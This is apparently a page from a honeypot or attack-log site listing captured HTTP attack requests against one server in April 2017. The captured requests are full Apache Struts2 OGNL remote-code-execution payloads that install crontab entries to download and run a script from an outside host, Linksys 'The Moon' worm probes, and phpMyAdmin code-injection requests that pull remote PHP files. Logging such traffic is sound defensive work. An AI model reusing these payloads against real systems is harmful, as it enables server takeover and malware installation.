This website uses cookies to improve user experience. By using this website you consent to all cookies in accordance with our terms.

Dismiss
Click here for some search hints
1-10 of 5940992 results (594100 pages)

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 18:24:49
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /struts2-showcase/showcase.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 17:27:00
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /index.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 09:52:17
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET / HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

Linksys "The Moon" Worm

[Attack info]
Attacker: 198.16.54.122
Dest. port: 8080
Time: 27/04/2017 07:47:39
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS33330 CloudRadium L.L.C
Location: Gansu, Sichuan
rDNS: 198.16.54-122.rdns.cloudradium.com
POST /HNAP1/ HTTP/1.0 Content-Length: 345 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetRouterLanSettings2" Host: 109.64.157.234:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://109.64.157.234:8080/ authorization: Basic Og== <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetRouterLanSettings2 xmlns="http://purenetworks.com/HNAP1/"> </GetRouterLanSettings2> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 198.16.54.122
Dest. port: 80
Time: 27/04/2017 07:45:29
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS33330 CloudRadium L.L.C
Location: Gansu, Sichuan
rDNS: 198.16.54-122.rdns.cloudradium.com
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/GetWLanRadios" Host: 109.64.157.234 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://109.64.157.234/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <GetWLanRadios xmlns="http://purenetworks.com/HNAP1/"> </GetWLanRadios> </soap:Body> </soap:Envelope>

Linksys "The Moon" Worm

[Attack info]
Attacker: 198.16.54.122
Dest. port: 80
Time: 27/04/2017 07:45:28
Resource(s):
Request: permalink
[Extra info]
ASN/ISP: AS33330 CloudRadium L.L.C
Location: Gansu, Sichuan
rDNS: 198.16.54-122.rdns.cloudradium.com
POST /HNAP1/ HTTP/1.0 Content-Length: 329 accept-language: en-US;q=0.6,en;q=0.4 accept-encoding: deflate, gzip, identity soapaction: "http://purenetworks.com/HNAP1/IsDeviceReady" Host: 109.64.157.234 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 connection: keep-alive referer: http://109.64.157.234/ <?xml version="1.0" encoding="utf-8"?> <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/"> <soap:Body> <IsDeviceReady xmlns="http://purenetworks.com/HNAP1/"> </IsDeviceReady> </soap:Body> </soap:Envelope>

Apache Struts2 Jakarta Multipart parser RCE

[Attack info]
Attacker: 194.87.94.136
Dest. port: 8080
Time: 27/04/2017 06:22:57
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS48347 JSC Mediasoft ekspert
Location: Moscow, Moscow (North-Western Administrative Okrug)
rDNS: ptr.ruvds.com
GET /index.action HTTP/1.1 accept-encoding: gzip, deflate connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 Host: 109.64.157.234:8080 Content-Type: %{(#_='multipart/form-data').([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "*/9 * * * * wget -O - -q http://91.230.47.41/common/logo.jpg|sh\n*/10 * * * * curl http://91.230.47.41/common/logo.jpg|sh" | crontab -').(#iswin=(@[email protected]('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

[Attack info]
Attacker: 212.237.10.57
Dest. port: 80
Time: 27/04/2017 03:09:19
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host57-10-237-212.serverdedicati.aruba.it
POST /phpmyadmin/scripts/setup.php HTTP/1.1 Content-Length: 245 cookie2: $Version="1" Host: 109.64.157.234 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] connection: TE referer: http://109.64.157.234/phpmyadmin/scripts/setup.php cookie: phpMyAdmin=c4ef423a538bbbfc10f62e7eea4855cd te: deflate,gzip;q=0.3 Content-Type: application/x-www-form-urlencoded action=lay_navigation&eoltype=unix&token=4897c9e3763bd13b6603495b78261d33&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A36%3A%22ftp%3A%2F%2F108%2E61%2E165%2E180%2Fpub%2Fdancers%2Ephp%22%3B%7D%7D

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

[Attack info]
Attacker: 212.237.10.57
Dest. port: 80
Time: 27/04/2017 03:09:18
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31034 Aruba S.p.A.
Location: Tuscany, Arezzo (zipcode 52100)
rDNS: host57-10-237-212.serverdedicati.aruba.it
POST /pma/scripts/setup.php HTTP/1.1 Content-Length: 245 cookie2: $Version="1" Host: 109.64.157.234 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] connection: TE referer: http://109.64.157.234/pma/scripts/setup.php cookie: phpMyAdmin=c4ef423a538bbbfc10f62e7eea4855cd te: deflate,gzip;q=0.3 Content-Type: application/x-www-form-urlencoded action=lay_navigation&eoltype=unix&token=4897c9e3763bd13b6603495b78261d33&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A36%3A%22ftp%3A%2F%2F108%2E61%2E165%2E180%2Fpub%2Fdancers%2Ephp%22%3B%7D%7D

phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit

[Attack info]
Attacker: 191.96.249.97
Dest. port: 80
Time: 27/04/2017 00:51:28
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS64484 Jupiter 25 Limited
Location: Moscow, Moscow (zipcode 101194)
POST /phpmyadmin/scripts/setup.php HTTP/1.1 Content-Length: 236 cookie2: $Version="1" Host: 109.64.157.234 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en] connection: TE referer: http://109.64.157.234/phpmyadmin/scripts/setup.php cookie: phpMyAdmin=c4ef423a538bbbfc10f62e7eea4855cd te: deflate,gzip;q=0.3 Content-Type: application/x-www-form-urlencoded action=lay_navigation&eoltype=unix&token=4897c9e3763bd13b6603495b78261d33&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A29%3A%22ftp%3A%2F%2F191%2E96%2E249%2E97%2Fconfo%2Ephp%22%3B%7D%7D